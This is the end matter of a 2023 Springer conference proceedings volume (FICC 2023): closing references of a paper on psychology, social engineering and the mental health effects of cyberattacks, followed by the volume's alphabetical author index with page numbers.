36. Montañez, R., Golob, E., Xu, S.: Human cognition through the lens of social engineering cyberattacks. Front. Psychol. (2020). https://doi.org/10.3389/fpsyg.2020.01755/full
37. Ohio State University: What Is Psychology? Department of Psychology. https://psychology.osu.edu/about/what-psychology
38. Laato, S., Islam, N., Whelan, E.: What drives unverified information sharing and cyberchondria during the COVID-19 pandemic? Eur. J. Inf. Syst. 29, 1–18 (2020). https://doi.org/10.1080/0960085X.2020.1770632
39. American Psychiatric Association: What Is Psychiatry? Psychiatry.org. https://psychiatry.org/patients-families/what-is-psychiatry
40. Michel, A.: Psyber security: thwarting hackers with behavioral science. APS Obs. 30(9) (2017). https://www.psychologicalscience.org/observer/psyber-security-thwarting-hackerswith-behavioral-science
41. Louie, R.K.: #Psybersecurity: the mental health attack surface. In: 41st IEEE Symposium on Security and Privacy (2020). http://www.ieee-security.org/TC/SP2020/program-shorttalks.html
42. Louie, R.K.: #Psybersecurity: mental health impacts of cyberattacks. In: RSA Conference, San Francisco, California (2020). https://www.rsaconference.com/library#q=psybersecuritymental-health-impact-of-cyberattacks
43. Louie, R.K.: #Psybersecurity clinic (2020). https://psybersecurity.clinic/
Author Index
A
Aalvik, Hege 796
Adenibuyan, Michael 349
Adeyiga, Johnson 349
Ahmad, Khurshid 79
Alieksieiev, Volodymyr 297
Anand, Amruth 242
Araghi, Tanya Koohpayeh 695
Ariffin, Suriyani 577
Atoum, Jalal Omer 25
Ayad, Mustafa 416
Ayala, Claudia 310
Ayele, Workneh Yilma 875
B
Babbar, Sana Mohsin 218
Barmawi, Ari Moesriami 521
Belaissaoui, Mustapha 286
Bergui, Mohammed 341
Beyene, Nahom 893
Block, Sunniva 310
Bräck, Niclas Johansson 875
C
Caceres, Juan Carlos Gutierrez 783
Chattopadhyay, Ankur 893
Chen, Zachary 759
Chenchev, Ivaylo 563
Chimbo, Bester 729
Clarke, Tyrone 416
Cruz, Mario Aquino 783
Cruzes, Daniela Soares 796
Cussi, Daniel Prado 39
D
Daniec, Krzysztof 862
Dashtipour, Kia 328
de Luz Palomino Valdivia, Flor 783
Dinesh, Dristi 602
Dlamini, Gcinizwe 11, 164
Dosunmu, Moyinoluwa 349
E
El Orche, Fatima-Ezzahra 674
F
Francis, Idachaba 614
G
Gallegos, Nickolas 396
Gogate, Mandar 328
Gutierrez-Garcia, Jose Luis 59
H
Hamilton, George 709
Heal, Maher 328
Heiden, Bernhard 297
Hetzler, Connor 759
Hollenstein, Marcel 674
Houdaigoui, Sarah 674
Huillcen Baca, Herwin Alayn 783
I
Ifeoluwa, Afolayan 614
Iliev, Alexander 155
Iliev, Alexander I. 205, 242, 257
Iovan, Monica 796
J
Jaccheri, Letizia 310
Jaoude, Gio Giorgio Abou 102
Jedrasiak, Karol 862
Jiang, Xuan 385
Jones Jr., James H. 656
Jung, Jinu 1
K
Kakhki, Fatemeh Davoudi 233
Kamimura, Ryotaro 117
Khan, Tahir M. 656, 709, 759
Kieu-Xuan, Thuc 446
King, Gordon 811, 824
Komolov, Sirojiddin 11
Krimm, Ronja 297
Kuestenmacher, Anastassia 183
L
LaMalva, Grace 602
Lee, Seonglim 1
Leffler, Linus 875
Leider, Avery 102
Lin, Shih-Ping 135
Lu, Laurence 385
Lu, Zhengzhu 541
M
MacFie, Joshua 396
Machaca Arceda, V. E. 39
MacKay, Jessica 416
Mahmoud, Ahmed Adel 635
Mansoor, Nazneen 155
Mbazirra, Alex V. 656
Megha, Swati 11
Megías, David 695
Meng, Bo 541
Ming, Gao 589
Moghadam, Armin 233
Montoya, Laura N. 482
Moselhy, Noha 635
Mosley, Pauline 102
Mrini, Younous El 286
Mtsweni, Jabu 729
Murali, Yatheendra Pravan Kidambi 79
Mwim, Emilia N. 729
N
Naccache, David 674
Najah, Said 341
Nawrat, Aleksander 862
Nguyen-Duc, Anh 796
Nikolov, Nikola S. 341
Nikolov, Ventsislav 474
Novocin, Andrew P. 849
P
Palyonov, Vadim 164
Panwar, Malvika 205
Parekh, Swapnil 743
Patón-Romero, J. David 310
Pchelina, Daria 674
Pham, Anh-Duy 183
Pietroń, Marcin 270
Ploeger, Paul G. 183
Podgorski, Hubert 862
Pozos-Parra, Maria del Pilar 59
Q
Quach, Duc-Cuong 446
R
Raksha, Ankitha 257
Recario, Reginald Neil C. 427
Roberts, Jennafer Shae 482
Rofiatunnajah, Nuril Kaunaini 521
Rønne, Peter B. 674
Rosales, Andrea 695
Roush, F. W. 362
Ryan, Peter Y. A. 674
S
Samara, Kamil 96
Sanchez-DelaCruz, Eddy 59
Schmeelk, Suzanna 602
Shah, Devansh 743
Shukla, Pratyush 743
Sobolewski, Michael 372
Solis, Ivan Soria 783
Song, Linyue 385
Sopha, Alexis 396
Sotonwa, Kehinde 349
Stachoń, Magdalena 270
Subburaj, Anitha Sarah 396
Subburaj, Vinitha Hannah 396
Suk, Jaehye 1
Sykes, Edward R. 502
T
Tan, Lu 1
Tonino-Heiden, Bianca 297
Tumpalan, John Karl B. 427
V
Vogel, Carl 79
W
Wang, Dejun 541
Wang, Hans 811, 824
Wang, Jiahui 541
Wang, Sheng-De 135
Wang, XiaoXiao 541
Wang, Xinyu 1
Weibel, Julien 674
Weil, Robert 674
Williams, Medina 709
Woronow, Paweł 862
Y
Yong, Lau Chee 218
You, Junyong 455
Yusof, Nor Azeala Mohd 577
Z
Zanina, Valeriya 164
Zhang, Zheng 455
Zhao, Can 541
Zingo, Pasquale A. T. 849
Zouhair, Yassine 286
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 913–915, 2023. https://doi.org/10.1007/978-3-031-28073-3